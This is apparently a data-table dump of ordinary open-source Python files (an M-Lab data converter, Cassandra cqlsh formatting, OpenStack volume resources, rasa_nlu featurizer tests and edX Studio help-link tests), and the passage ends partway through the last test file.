repo_name (stringlengths 5-100) | path (stringlengths 4-375) | copies (stringclasses, 991 values) | size (stringlengths 4-7) | content (stringlengths 666-1M) | license (stringclasses, 15 values)
---|---|---|---|---|---
mtlynch/mlab-observatory | convert_from_telescope/convert_from_telescope.py | 1 | 7124 |
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
#
# Copyright 2015 Measurement Lab
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Converts Telescope output files into data files for M-Lab Observatory."""
import argparse
import datetime
import glob
import logging
import os
import convert
import observatory_file_writer
import reducer
import result_grouper
import sample_checking
import whitelister
def setup_logger():
logger = logging.getLogger('telescope-convert')
console_handler = logging.StreamHandler()
logger.addHandler(console_handler)
logger.setLevel(logging.INFO)
return logger
def read_whitelist(whitelist_filename):
"""Read the whitelist file."""
with open(whitelist_filename) as whitelist_file:
deserializer = whitelister.MetadataWhitelistSerializer()
return deserializer.deserialize(whitelist_file)
def update_whitelist(whitelist_filename, sample_count_checker,
input_filenames):
"""Update the whitelist file with new datasets.
Update the whitelist file to include any new datasets that currently meet the
sample size requirements.
Args:
whitelist_filename: (str) Filename of whitelist file to update.
sample_count_checker: (sample_checking.SampleCounter) Sample counter to
check sample size requirements.
input_filenames: (list) A list of filenames from which to find datasets to
add to the whitelist.
Returns:
(whitelister.MetadataWhitelist) Updated whitelist object.
"""
whitelist = read_whitelist(whitelist_filename)
updater = whitelister.MetadataWhitelistUpdater(whitelist,
sample_count_checker)
if updater.update(input_filenames):
with open(whitelist_filename, 'w') as whitelist_file:
serializer = whitelister.MetadataWhitelistSerializer()
serializer.serialize(whitelist, whitelist_file)
return whitelist
def filter_files(whitelist, input_filenames):
"""Filter out the inputs that do not meet sample size requirements.
Preprocesses Telescope data files to filter out the result sets that do not
meet sample size requirements.
Args:
whitelist: (whitelister.MetadataWhitelist) Whitelist to use for filtering.
input_filenames: (list) Names of files to preprocess.
Returns:
(list) A list of filenames that meet the sample size requirements.
"""
file_checker = whitelister.DataFileWhitelistChecker(whitelist)
return [filename for filename in input_filenames
if file_checker.is_whitelisted(filename)]
def perform_conversion(input_filenames, output_dir):
"""Converts Telescope files to Observatory format.
Args:
input_filenames: (list) A list of raw Telescope output files to convert.
output_dir: (str) Directory in which to place converted Observatory files.
"""
median_reducer = reducer.MedianReducer()
file_writer = observatory_file_writer.ObservatoryFileWriter()
per_site_result_grouper = result_grouper.PerSiteTelescopeResultGrouper()
per_site_output_dir = os.path.join(output_dir, 'data', 'exploreData')
per_site_valid_keys_path = os.path.join(output_dir,
'metadata',
'validExploreKeys.txt')
per_site_converter = convert.ResultConverter(per_site_result_grouper,
median_reducer,
file_writer,
per_site_output_dir,
per_site_valid_keys_path)
per_metro_result_grouper = result_grouper.PerMetroTelescopeResultGrouper()
per_metro_output_dir = os.path.join(output_dir, 'data', 'compareData')
per_metro_valid_keys_path = os.path.join(output_dir,
'metadata',
'validCompareKeys.txt')
per_metro_converter = convert.ResultConverter(per_metro_result_grouper,
median_reducer,
file_writer,
per_metro_output_dir,
per_metro_valid_keys_path)
for converter in (per_site_converter, per_metro_converter):
converter.convert_to_observatory_format(input_filenames)
def main(args):
logger = setup_logger()
program_start_time = datetime.datetime.utcnow()
input_files = glob.glob(args.input_pattern)
if not args.no_whitelist_update:
logger.info('Updating dataset whitelist.')
now = datetime.datetime.utcnow()
end_time = datetime.datetime(now.year, now.month, 1)
min_samples_per_day = int(args.samples_per_day)
percentage_of_days_threshold = float(args.percentage_valid_days)
sample_counter = sample_checking.SampleCounter()
sample_checker = sample_checking.SampleCountChecker(
sample_counter, end_time, min_samples_per_day,
percentage_of_days_threshold)
whitelist = update_whitelist(args.whitelist, sample_checker, input_files)
else:
whitelist = read_whitelist(args.whitelist)
filtered_files = filter_files(whitelist, input_files)
perform_conversion(filtered_files, args.output)
program_end_time = datetime.datetime.utcnow()
runtime_mins = (program_end_time - program_start_time).total_seconds() / 60.0
logger.info('Conversion completed in %.1f minutes.', runtime_mins)
if __name__ == '__main__':
parser = argparse.ArgumentParser(
prog='Observatory Data Preparation Tool',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('-i', '--input_pattern', default=None,
help=('Input pattern (in quotes) specifying CSV '
'datafile(s) to merge.'))
parser.add_argument('-o', '--output', default='../static/observatory/',
help='Output path.')
parser.add_argument('--samples_per_day', default='30',
help='Minimum number of samples required per day.')
parser.add_argument('--percentage_valid_days', default='0.80',
help='Required percentage of valid days.')
parser.add_argument('--whitelist',
default='../static/observatory/metadata/whitelist.txt',
help='Whitelist of datasets to include in results.')
parser.add_argument('--no_whitelist_update', default=False,
action='store_true',
help=('Skips check that datasets meet sample count '
'minimums.'))
main(parser.parse_args())
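# Example invocation (illustration only; the flags come from the argparse
# setup above). The pattern is quoted so the shell does not expand the glob:
#
#   python convert_from_telescope.py -i 'telescope-output/*.csv' \
#       -o ../static/observatory/ --samples_per_day 30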
| apache-2.0 |
aarushi12002/cassandra | pylib/cqlshlib/formatting.py | 17 | 11961 |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import calendar
import math
import platform
import re
import sys
from collections import defaultdict
from . import wcwidth
from .displaying import colorme, FormattedValue, DEFAULT_VALUE_COLORS
from cassandra.cqltypes import EMPTY
from cassandra.util import datetime_from_timestamp
from util import UTC
is_win = platform.system() == 'Windows'
unicode_controlchars_re = re.compile(r'[\x00-\x31\x7f-\xa0]')
controlchars_re = re.compile(r'[\x00-\x31\x7f-\xff]')
def _show_control_chars(match):
txt = repr(match.group(0))
if txt.startswith('u'):
txt = txt[2:-1]
else:
txt = txt[1:-1]
return txt
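# Illustration: _show_control_chars renders a control character as its
# escaped repr, e.g. the NUL byte '\x00' comes back as the visible four
# characters "\x00"; for unicode input, repr() adds a leading 'u', which is
# what the startswith('u') branch above strips.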
bits_to_turn_red_re = re.compile(r'\\([^uUx]|u[0-9a-fA-F]{4}|x[0-9a-fA-F]{2}|U[0-9a-fA-F]{8})')
def _make_turn_bits_red_f(color1, color2):
def _turn_bits_red(match):
txt = match.group(0)
if txt == '\\\\':
return '\\'
return color1 + txt + color2
return _turn_bits_red
default_null_placeholder = 'null'
default_float_precision = 3
default_colormap = DEFAULT_VALUE_COLORS
empty_colormap = defaultdict(lambda: '')
def format_by_type(cqltype, val, encoding, colormap=None, addcolor=False,
nullval=None, date_time_format=None, float_precision=None):
if nullval is None:
nullval = default_null_placeholder
if val is None:
return colorme(nullval, colormap, 'error')
if addcolor is False:
colormap = empty_colormap
elif colormap is None:
colormap = default_colormap
if date_time_format is None:
date_time_format = DateTimeFormat()
if float_precision is None:
float_precision = default_float_precision
return format_value(cqltype, val, encoding=encoding, colormap=colormap,
date_time_format=date_time_format, float_precision=float_precision,
nullval=nullval)
def color_text(bval, colormap, displaywidth=None):
# note that here, we render natural backslashes as just backslashes,
# in the same color as surrounding text, when using color. When not
# using color, we need to double up the backslashes so it's not
# ambiguous. This introduces the unique difficulty of having different
# display widths for the colored and non-colored versions. To avoid
# adding the smarts to handle that in to FormattedValue, we just
# make an explicit check to see if a null colormap is being used or
# not.
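    # Worked example of the correction below: for a value containing one
    # natural backslash, bval holds the two characters '\\'; the colored
    # rendering collapses them back to a single '\', so the display width
    # is one less than len(bval). Without color the doubled backslash is
    # kept, and len(bval) is already the right width.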
if displaywidth is None:
displaywidth = len(bval)
tbr = _make_turn_bits_red_f(colormap['blob'], colormap['text'])
coloredval = colormap['text'] + bits_to_turn_red_re.sub(tbr, bval) + colormap['reset']
if colormap['text']:
displaywidth -= bval.count(r'\\')
return FormattedValue(bval, coloredval, displaywidth)
DEFAULT_NANOTIME_FORMAT = '%H:%M:%S.%N'
DEFAULT_DATE_FORMAT = '%Y-%m-%d'
DEFAULT_TIMESTAMP_FORMAT = '%Y-%m-%d %H:%M:%S%z'
if platform.system() == 'Windows':
DEFAULT_TIME_FORMAT = '%Y-%m-%d %H:%M:%S %Z'
class DateTimeFormat():
def __init__(self, timestamp_format=DEFAULT_TIMESTAMP_FORMAT, date_format=DEFAULT_DATE_FORMAT, nanotime_format=DEFAULT_NANOTIME_FORMAT):
self.timestamp_format = timestamp_format
self.date_format = date_format
self.nanotime_format = nanotime_format
def format_value_default(val, colormap, **_):
val = str(val)
escapedval = val.replace('\\', '\\\\')
bval = controlchars_re.sub(_show_control_chars, escapedval)
return color_text(bval, colormap)
# Mapping cql type base names ("int", "map", etc) to formatter functions,
# making format_value a generic function
_formatters = {}
def format_value(type, val, **kwargs):
if val == EMPTY:
return format_value_default('', **kwargs)
formatter = _formatters.get(type.__name__, format_value_default)
return formatter(val, **kwargs)
def formatter_for(typname):
def registrator(f):
_formatters[typname] = f
return f
return registrator
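# Illustration of the registration pattern above ('MyType' is a
# hypothetical name, not part of the module):
#
#   @formatter_for('MyType')
#   def format_value_mytype(val, colormap, **_):
#       return colorme(str(val), colormap, 'text')
#
# format_value(type(v), v, ...) then dispatches through _formatters using
# the type's __name__, falling back to format_value_default.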
@formatter_for('bytearray')
def format_value_blob(val, colormap, **_):
bval = '0x' + ''.join('%02x' % c for c in val)
return colorme(bval, colormap, 'blob')
formatter_for('buffer')(format_value_blob)
def format_python_formatted_type(val, colormap, color, quote=False):
bval = str(val)
if quote:
bval = "'%s'" % bval
return colorme(bval, colormap, color)
@formatter_for('Decimal')
def format_value_decimal(val, colormap, **_):
return format_python_formatted_type(val, colormap, 'decimal')
@formatter_for('UUID')
def format_value_uuid(val, colormap, **_):
return format_python_formatted_type(val, colormap, 'uuid')
@formatter_for('inet')
def formatter_value_inet(val, colormap, quote=False, **_):
return format_python_formatted_type(val, colormap, 'inet', quote=quote)
@formatter_for('bool')
def format_value_boolean(val, colormap, **_):
return format_python_formatted_type(val, colormap, 'boolean')
def format_floating_point_type(val, colormap, float_precision, **_):
if math.isnan(val):
bval = 'NaN'
elif math.isinf(val):
bval = 'Infinity'
else:
exponent = int(math.log10(abs(val))) if abs(val) > sys.float_info.epsilon else -sys.maxsize - 1
if -4 <= exponent < float_precision:
# when this is true %g will not use scientific notation,
# increasing precision should not change this decision
# so we increase the precision to take into account the
# digits to the left of the decimal point
float_precision = float_precision + exponent + 1
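        # Worked example (illustration): val=12.345 with float_precision=3
        # gives exponent=1, so the precision is bumped to 5 and '%.5g'
        # prints '12.345'; without the bump, '%.3g' would give '12.3'.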
bval = '%.*g' % (float_precision, val)
return colorme(bval, colormap, 'float')
formatter_for('float')(format_floating_point_type)
def format_integer_type(val, colormap, **_):
# base-10 only for now; support others?
bval = str(val)
return colorme(bval, colormap, 'int')
formatter_for('long')(format_integer_type)
formatter_for('int')(format_integer_type)
@formatter_for('datetime')
def format_value_timestamp(val, colormap, date_time_format, quote=False, **_):
bval = strftime(date_time_format.timestamp_format, calendar.timegm(val.utctimetuple()))
if quote:
bval = "'%s'" % bval
return colorme(bval, colormap, 'timestamp')
def strftime(time_format, seconds):
tzless_dt = datetime_from_timestamp(seconds)
return tzless_dt.replace(tzinfo=UTC()).strftime(time_format)
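# Illustration: strftime(DEFAULT_TIMESTAMP_FORMAT, 0) yields
# '1970-01-01 00:00:00+0000', since the naive datetime is pinned to UTC
# before formatting.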
@formatter_for('Date')
def format_value_date(val, colormap, **_):
return format_python_formatted_type(val, colormap, 'date')
@formatter_for('Time')
def format_value_time(val, colormap, **_):
return format_python_formatted_type(val, colormap, 'time')
@formatter_for('str')
def format_value_text(val, encoding, colormap, quote=False, **_):
escapedval = val.replace(u'\\', u'\\\\')
if quote:
escapedval = escapedval.replace("'", "''")
escapedval = unicode_controlchars_re.sub(_show_control_chars, escapedval)
bval = escapedval.encode(encoding, 'backslashreplace')
if quote:
bval = "'%s'" % bval
displaywidth = wcwidth.wcswidth(bval.decode(encoding))
return color_text(bval, colormap, displaywidth)
# name alias
formatter_for('unicode')(format_value_text)
def format_simple_collection(val, lbracket, rbracket, encoding,
colormap, date_time_format, float_precision, nullval):
subs = [format_value(type(sval), sval, encoding=encoding, colormap=colormap,
date_time_format=date_time_format, float_precision=float_precision,
nullval=nullval, quote=True)
for sval in val]
bval = lbracket + ', '.join(sval.strval for sval in subs) + rbracket
lb, sep, rb = [colormap['collection'] + s + colormap['reset']
for s in (lbracket, ', ', rbracket)]
coloredval = lb + sep.join(sval.coloredval for sval in subs) + rb
displaywidth = 2 * len(subs) + sum(sval.displaywidth for sval in subs)
return FormattedValue(bval, coloredval, displaywidth)
@formatter_for('list')
def format_value_list(val, encoding, colormap, date_time_format, float_precision, nullval, **_):
return format_simple_collection(val, '[', ']', encoding, colormap,
date_time_format, float_precision, nullval)
@formatter_for('tuple')
def format_value_tuple(val, encoding, colormap, date_time_format, float_precision, nullval, **_):
return format_simple_collection(val, '(', ')', encoding, colormap,
date_time_format, float_precision, nullval)
@formatter_for('set')
def format_value_set(val, encoding, colormap, date_time_format, float_precision, nullval, **_):
return format_simple_collection(sorted(val), '{', '}', encoding, colormap,
date_time_format, float_precision, nullval)
formatter_for('frozenset')(format_value_set)
formatter_for('sortedset')(format_value_set)
@formatter_for('dict')
def format_value_map(val, encoding, colormap, date_time_format, float_precision, nullval, **_):
def subformat(v):
return format_value(type(v), v, encoding=encoding, colormap=colormap,
date_time_format=date_time_format, float_precision=float_precision,
nullval=nullval, quote=True)
subs = [(subformat(k), subformat(v)) for (k, v) in sorted(val.items())]
bval = '{' + ', '.join(k.strval + ': ' + v.strval for (k, v) in subs) + '}'
lb, comma, colon, rb = [colormap['collection'] + s + colormap['reset']
for s in ('{', ', ', ': ', '}')]
coloredval = lb \
+ comma.join(k.coloredval + colon + v.coloredval for (k, v) in subs) \
+ rb
displaywidth = 4 * len(subs) + sum(k.displaywidth + v.displaywidth for (k, v) in subs)
return FormattedValue(bval, coloredval, displaywidth)
formatter_for('OrderedDict')(format_value_map)
formatter_for('OrderedMap')(format_value_map)
formatter_for('OrderedMapSerializedKey')(format_value_map)
def format_value_utype(val, encoding, colormap, date_time_format, float_precision, nullval, **_):
def format_field_value(v):
if v is None:
return colorme(nullval, colormap, 'error')
return format_value(type(v), v, encoding=encoding, colormap=colormap,
date_time_format=date_time_format, float_precision=float_precision,
nullval=nullval, quote=True)
def format_field_name(name):
return format_value_text(name, encoding=encoding, colormap=colormap, quote=False)
subs = [(format_field_name(k), format_field_value(v)) for (k, v) in val._asdict().items()]
bval = '{' + ', '.join(k.strval + ': ' + v.strval for (k, v) in subs) + '}'
lb, comma, colon, rb = [colormap['collection'] + s + colormap['reset']
for s in ('{', ', ', ': ', '}')]
coloredval = lb \
+ comma.join(k.coloredval + colon + v.coloredval for (k, v) in subs) \
+ rb
displaywidth = 4 * len(subs) + sum(k.displaywidth + v.displaywidth for (k, v) in subs)
return FormattedValue(bval, coloredval, displaywidth)
| apache-2.0 |
sjsucohort6/openstack | python/venv/lib/python2.7/site-packages/openstack/block_store/v2/volume.py | 3 | 4149 |
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from openstack.block_store import block_store_service
from openstack import resource
class Volume(resource.Resource):
resource_key = "volume"
resources_key = "volumes"
base_path = "/volumes"
service = block_store_service.BlockStoreService()
# capabilities
allow_retrieve = True
allow_create = True
allow_delete = True
allow_update = True
# Properties
#: A UUID representing this volume.
id = resource.prop("id")
#: The name of this volume.
name = resource.prop("name")
#: A list of links associated with this volume. *Type: list*
links = resource.prop("links", type=list)
#: The availability zone.
availability_zone = resource.prop("availability_zone")
#: To create a volume from an existing volume, specify the ID of
#: the existing volume. If specified, the volume is created with
#: same size of the source volume.
source_volume = resource.prop("source_volid")
#: The volume description.
description = resource.prop("description")
#: To create a volume from an existing snapshot, specify the ID of
#: the existing volume snapshot. If specified, the volume is created
#: in same availability zone and with same size of the snapshot.
snapshot = resource.prop("snapshot_id")
#: The size of the volume, in GBs. *Type: int*
size = resource.prop("size", type=int)
#: The ID of the image from which you want to create the volume.
#: Required to create a bootable volume.
image = resource.prop("imageRef")
#: The associated volume type.
type = resource.prop("volume_type")
#: Enables or disables the bootable attribute. You can boot an
#: instance from a bootable volume. *Type: bool*
bootable = resource.prop("bootable", type=bool)
#: One or more metadata key and value pairs to associate with the volume.
metadata = resource.prop("metadata")
#: One of the following values: creating, available, attaching, in-use
#: deleting, error, error_deleting, backing-up, restoring-backup,
#: error_restoring. For details on these statuses, see the
#: Block Storage API documentation.
status = resource.prop("status")
#: TODO(briancurtin): This is currently undocumented in the API.
attachments = resource.prop("attachments")
#: The time this volume was created at.
created = resource.prop("created_at")
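# Illustration (an assumption about how resource.prop behaves, not code
# from this module): each prop maps a friendly attribute name to the JSON
# key used on the wire, e.g.
#
#   volume = Volume()
#   volume.size = 10               # carried under the "size" key
#   volume.source_volume = "<id>"  # carried under "source_volid"
#
# so callers get readable names while request bodies keep the API's
# original field names.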
class VolumeDetail(Volume):
base_path = "/volumes/detail"
#: The volume's current back-end.
host = resource.prop("os-vol-host-attr:host")
#: The project ID associated with current back-end.
project_id = resource.prop("os-vol-tenant-attr:tenant_id")
#: The status of this volume's migration (None means that a migration
#: is not currently in progress).
migration_status = resource.prop("os-vol-mig-status-attr:migstat")
#: The volume ID that this volume's name on the back-end is based on.
migration_id = resource.prop("os-vol-mig-status-attr:name_id")
#: Status of replication on this volume.
replication_status = resource.prop("replication_status")
#: Extended replication status on this volume.
extended_replication_status = resource.prop(
"os-volume-replication:extended_status")
#: ID of the consistency group.
consistency_group = resource.prop("consistencygroup_id")
#: Data set by the replication driver
replication_driver_data = resource.prop(
"os-volume-replication:driver_data")
#: ``True`` if this volume is encrypted, ``False`` if not. *Type: bool*
encrypted = resource.prop("encrypted", type=bool)
| mit |
beeva-fernandocerezal/rasa_nlu | _pytest/test_featurizers.py | 2 | 4141 |
from __future__ import unicode_literals
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
import os
import numpy as np
import pytest
from rasa_nlu.tokenizers.mitie_tokenizer import MitieTokenizer
from rasa_nlu.tokenizers.spacy_tokenizer import SpacyTokenizer
from rasa_nlu.training_data import Message
@pytest.mark.parametrize("sentence, expected", [
("hey how are you today", [-0.19649599, 0.32493639, -0.37408298, -0.10622784, 0.062756])
])
def test_spacy_featurizer(sentence, expected, spacy_nlp):
from rasa_nlu.featurizers.spacy_featurizer import SpacyFeaturizer
ftr = SpacyFeaturizer()
doc = spacy_nlp(sentence)
vecs = ftr.features_for_doc(doc)
assert np.allclose(doc.vector[:5], expected, atol=1e-5)
assert np.allclose(vecs, doc.vector, atol=1e-5)
def test_mitie_featurizer(mitie_feature_extractor, default_config):
from rasa_nlu.featurizers.mitie_featurizer import MitieFeaturizer
default_config["mitie_file"] = os.environ.get('MITIE_FILE')
if not default_config["mitie_file"] or not os.path.isfile(default_config["mitie_file"]):
default_config["mitie_file"] = os.path.join("data", "total_word_feature_extractor.dat")
ftr = MitieFeaturizer.load()
sentence = "Hey how are you today"
tokens = MitieTokenizer().tokenize(sentence)
vecs = ftr.features_for_tokens(tokens, mitie_feature_extractor)
assert np.allclose(vecs[:5], np.array([0., -4.4551446, 0.26073121, -1.46632245, -1.84205751]), atol=1e-5)
def test_ngram_featurizer(spacy_nlp):
from rasa_nlu.featurizers.ngram_featurizer import NGramFeaturizer
ftr = NGramFeaturizer()
repetition_factor = 5 # ensures that during random sampling of the ngram CV we don't end up with a one-class-split
labeled_sentences = [
Message("heyheyheyhey", {"intent": "greet", "text_features": [0.5]}),
Message("howdyheyhowdy", {"intent": "greet", "text_features": [0.5]}),
Message("heyhey howdyheyhowdy", {"intent": "greet", "text_features": [0.5]}),
Message("howdyheyhowdy heyhey", {"intent": "greet", "text_features": [0.5]}),
Message("astalavistasista", {"intent": "goodby", "text_features": [0.5]}),
Message("astalavistasista sistala", {"intent": "goodby", "text_features": [0.5]}),
Message("sistala astalavistasista", {"intent": "goodby", "text_features": [0.5]}),
] * repetition_factor
for m in labeled_sentences:
m.set("spacy_doc", spacy_nlp(m.text))
ftr.min_intent_examples_for_ngram_classification = 2
ftr.train_on_sentences(labeled_sentences,
max_number_of_ngrams=10)
assert len(ftr.all_ngrams) > 0
assert ftr.best_num_ngrams > 0
@pytest.mark.parametrize("sentence, expected, labeled_tokens", [
("hey how are you today", [0., 1.], [0]),
("hey 123 how are you", [1., 1.], [0, 1]),
("blah balh random eh", [0., 0.], []),
("looks really like 123 today", [1., 0.], [3]),
])
def test_regex_featurizer(sentence, expected, labeled_tokens, spacy_nlp):
from rasa_nlu.featurizers.regex_featurizer import RegexFeaturizer
patterns = [
{"pattern": '[0-9]+', "name": "number", "usage": "intent"},
{"pattern": '\\bhey*', "name": "hello", "usage": "intent"}
]
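    # Each pattern above contributes one feature dimension, in order: the
    # parametrized `expected` vector is [number_matched, hello_matched],
    # and `labeled_tokens` lists the token indices a pattern annotated.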
ftr = RegexFeaturizer(patterns)
# adds tokens to the message
tokenizer = SpacyTokenizer()
message = Message(sentence)
message.set("spacy_doc", spacy_nlp(sentence))
tokenizer.process(message)
result = ftr.features_for_patterns(message)
assert np.allclose(result, expected, atol=1e-10)
assert len(message.get("tokens", [])) > 0 # the tokenizer should have added tokens
for i, token in enumerate(message.get("tokens")):
if i in labeled_tokens:
assert token.get("pattern") in [0, 1]
else:
assert token.get("pattern") is None # if the token is not part of a regex the pattern should not be set
| apache-2.0 |
naresh21/synergetics-edx-platform | common/test/acceptance/tests/studio/test_studio_help.py | 3 | 49206 |
"""
Test the Studio help links.
"""
from nose.plugins.attrib import attr
from unittest import skip
from common.test.acceptance.fixtures.course import XBlockFixtureDesc
from common.test.acceptance.tests.studio.base_studio_test import StudioCourseTest, ContainerBase
from common.test.acceptance.pages.studio.index import DashboardPage, DashboardPageWithPrograms
from common.test.acceptance.pages.studio.utils import click_studio_help, studio_help_links
from common.test.acceptance.pages.studio.index import IndexPage, HomePage
from common.test.acceptance.tests.studio.base_studio_test import StudioLibraryTest
from common.test.acceptance.pages.studio.course_info import CourseUpdatesPage
from common.test.acceptance.pages.studio.utils import click_css
from common.test.acceptance.pages.studio.library import LibraryPage
from common.test.acceptance.pages.studio.users import LibraryUsersPage
from common.test.acceptance.pages.studio.overview import CourseOutlinePage
from common.test.acceptance.pages.studio.asset_index import AssetIndexPage
from common.test.acceptance.pages.studio.edit_tabs import PagesPage
from common.test.acceptance.pages.studio.textbook_upload import TextbookUploadPage
from common.test.acceptance.pages.studio.settings import SettingsPage
from common.test.acceptance.pages.studio.settings_graders import GradingPage
from common.test.acceptance.pages.studio.settings_group_configurations import GroupConfigurationsPage
from common.test.acceptance.pages.studio.settings_advanced import AdvancedSettingsPage
from common.test.acceptance.pages.studio.settings_certificates import CertificatesPage
from common.test.acceptance.pages.studio.import_export import ExportCoursePage, ImportCoursePage
from common.test.acceptance.pages.studio.users import CourseTeamPage
from common.test.acceptance.fixtures.programs import ProgramsConfigMixin
from common.test.acceptance.tests.helpers import (
AcceptanceTest,
assert_nav_help_link,
assert_side_bar_help_link
)
from common.test.acceptance.pages.studio.import_export import ExportLibraryPage, ImportLibraryPage
from common.test.acceptance.pages.studio.auto_auth import AutoAuthPage
@attr(shard=10)
class StudioHelpTest(StudioCourseTest):
"""Tests for Studio help."""
def test_studio_help_links(self):
"""Test that the help links are present and have the correct content."""
page = DashboardPage(self.browser)
page.visit()
click_studio_help(page)
links = studio_help_links(page)
expected_links = [{
'href': u'http://docs.edx.org/',
'text': u'edX Documentation',
'sr_text': u'Access documentation on http://docs.edx.org'
}, {
'href': u'https://open.edx.org/',
'text': u'Open edX Portal',
'sr_text': u'Access the Open edX Portal'
}, {
'href': u'https://www.edx.org/course/overview-creating-edx-course-edx-edx101#.VO4eaLPF-n1',
'text': u'Enroll in edX101',
'sr_text': u'Enroll in edX101: Overview of Creating an edX Course'
}, {
'href': u'https://www.edx.org/course/creating-course-edx-studio-edx-studiox',
'text': u'Enroll in StudioX',
'sr_text': u'Enroll in StudioX: Creating a Course with edX Studio'
}, {
'href': u'mailto:[email protected]',
'text': u'Contact Us',
'sr_text': 'Send an email to [email protected]'
}]
for expected, actual in zip(expected_links, links):
self.assertEqual(expected['href'], actual.get_attribute('href'))
self.assertEqual(expected['text'], actual.text)
self.assertEqual(
expected['sr_text'],
actual.find_element_by_xpath('following-sibling::span').text
)
@attr(shard=10)
class SignInHelpTest(AcceptanceTest):
"""
Tests help links on 'Sign In' page
"""
def setUp(self):
super(SignInHelpTest, self).setUp()
self.index_page = IndexPage(self.browser)
self.index_page.visit()
def test_sign_in_nav_help(self):
"""
Scenario: Help link in navigation bar is working on 'Sign In' page.
Given that I am on the 'Sign In' page.
And I want help about the sign in
And I click the 'Help' in the navigation bar
Then Help link should open.
And help url should end with 'getting_started/get_started.html'
"""
sign_in_page = self.index_page.click_sign_in()
# The href we want to see in anchor help element.
href = 'http://edx.readthedocs.io/projects/open-edx-building-and-running-a-course/' \
'en/latest/getting_started/get_started.html'
# Assert that help link is correct.
assert_nav_help_link(
test=self,
page=sign_in_page,
href=href,
signed_in=False
)
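# Hedged sketch (an assumption, not the real edx helper): assert_nav_help_link
# presumably locates the 'Help' anchor in the page's navigation bar and
# compares its href with the documented URL, roughly:
#
#   def assert_nav_help_link(test, page, href, signed_in=True):
#       help_anchor_href = ...  # look up the nav bar's Help <a> element
#       test.assertEqual(help_anchor_href, href)
#
# with `signed_in` selecting which navigation variant to inspect.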
@attr(shard=10)
class SignUpHelpTest(AcceptanceTest):
"""
Tests help links on 'Sign Up' page.
"""
def setUp(self):
super(SignUpHelpTest, self).setUp()
self.index_page = IndexPage(self.browser)
self.index_page.visit()
def test_sign_up_nav_help(self):
"""
Scenario: Help link in navigation bar is working on 'Sign Up' page.
Given that I am on the 'Sign Up' page.
And I want help about the sign up
And I click the 'Help' in the navigation bar
Then Help link should open.
And help url should end with 'getting_started/get_started.html'
"""
sign_up_page = self.index_page.click_sign_up()
# The href we want to see in anchor help element.
href = 'http://edx.readthedocs.io/projects/open-edx-building-and-running-a-course/' \
'en/latest/getting_started/get_started.html'
# Assert that help link is correct.
assert_nav_help_link(
test=self,
page=sign_up_page,
href=href,
signed_in=False
)
@attr(shard=10)
class HomeHelpTest(StudioCourseTest):
"""
Tests help links on 'Home'(Courses tab) page.
"""
def setUp(self): # pylint: disable=arguments-differ
super(HomeHelpTest, self).setUp()
self.home_page = HomePage(self.browser)
self.home_page.visit()
def test_course_home_nav_help(self):
"""
Scenario: Help link in navigation bar is working on 'Home'(Courses tab) page.
Given that I am on the 'Home'(Courses tab) page.
And I want help about the courses
And I click the 'Help' in the navigation bar
Then Help link should open.
And help url should end with 'getting_started/get_started.html'
"""
# The href we want to see in anchor help element.
href = 'http://edx.readthedocs.io/projects/open-edx-building-and-running-a-course/' \
'en/latest/getting_started/get_started.html'
# Assert that help link is correct.
assert_nav_help_link(
test=self,
page=self.home_page,
href=href
)
def test_course_home_side_bar_help(self):
"""
Scenario: Help link in sidebar links is working on 'Home'(Courses tab) page.
Given that I am on the 'Home'(Courses tab) page.
And I want help about the courses
And I click the 'Getting Started with edX Studio' in the sidebar links
Then Help link should open.
And help url should end with 'getting_started/get_started.html'
"""
# The href we want to see in anchor help element.
href = 'http://edx.readthedocs.io/projects/open-edx-building-and-running-a-course/' \
'en/latest/getting_started/get_started.html'
# Assert that help link is correct.
assert_side_bar_help_link(
test=self,
page=self.home_page,
href=href,
help_text='Getting Started with edX Studio',
as_list_item=True
)
@attr(shard=10)
class NewCourseHelpTest(AcceptanceTest):
"""
Test help links while creating a new course.
"""
def setUp(self):
super(NewCourseHelpTest, self).setUp()
self.auth_page = AutoAuthPage(self.browser, staff=True)
self.dashboard_page = DashboardPage(self.browser)
self.auth_page.visit()
self.dashboard_page.visit()
self.assertTrue(self.dashboard_page.new_course_button.present)
self.dashboard_page.click_new_course_button()
def test_course_create_nav_help(self):
"""
Scenario: Help link in navigation bar is working on 'Create a New Course' page in the dashboard.
Given that I am on the 'Create a New Course' page in the dashboard.
And I want help about the process
And I click the 'Help' in the navigation bar
Then Help link should open.
And help url should end with 'getting_started/get_started.html'
"""
# The href we want to see in anchor help element.
href = 'http://edx.readthedocs.io/projects/open-edx-building-and-running-a-course' \
'/en/latest/getting_started/get_started.html'
# Assert that help link is correct.
assert_nav_help_link(
test=self,
page=self.dashboard_page,
href=href
)
def test_course_create_side_bar_help(self):
"""
Scenario: Help link in sidebar links is working on 'Create a New Course' page in the dashboard.
Given that I am on the 'Create a New Course' page in the dashboard.
And I want help about the process
And I click the 'Getting Started with edX Studio' in the sidebar links
Then Help link should open.
And help url should end with 'getting_started/get_started.html'
"""
# The href we want to see in anchor help element.
href = 'http://edx.readthedocs.io/projects/open-edx-building-and-running-a-course/' \
'en/latest/getting_started/get_started.html'
# Assert that help link is correct.
assert_side_bar_help_link(
test=self,
